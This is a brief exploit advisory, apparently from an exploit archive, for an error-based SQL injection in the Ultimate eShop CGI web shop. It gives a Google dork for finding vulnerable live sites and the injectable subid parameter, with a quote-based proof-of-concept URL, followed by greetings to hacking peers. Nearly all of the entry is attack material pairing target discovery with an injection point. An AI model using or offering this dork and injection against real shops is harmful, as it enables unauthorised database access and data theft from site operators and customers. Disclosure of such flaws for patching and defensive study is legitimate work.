Ultimate eShop suffers from a remote SQL injection vulnerability.
4be2a466cf2c1cad9c4b435c840ea2f53794b965b7a7b1d8de0d42c0fb4bc8f2
# Exploit Title: Ultimate eShop Error Based SQL Injection Vulnerability
# Google Dork: inurl:index.cgi?aktion=shopview
# Date: 19/04/2011
# Author: Romka
# Software Link: http://www.ultimate-eshop.de/
# Tested on: Windows XP SP3
# Exploit:
http://localhost/index.cgi?aktion=shopview&go=artikel&topid=1&subid=1'ERROR BASED INJECTION
# Greetings:
CliC, pyro, r0bnet, Haukez, Dexter and Cyberpunkz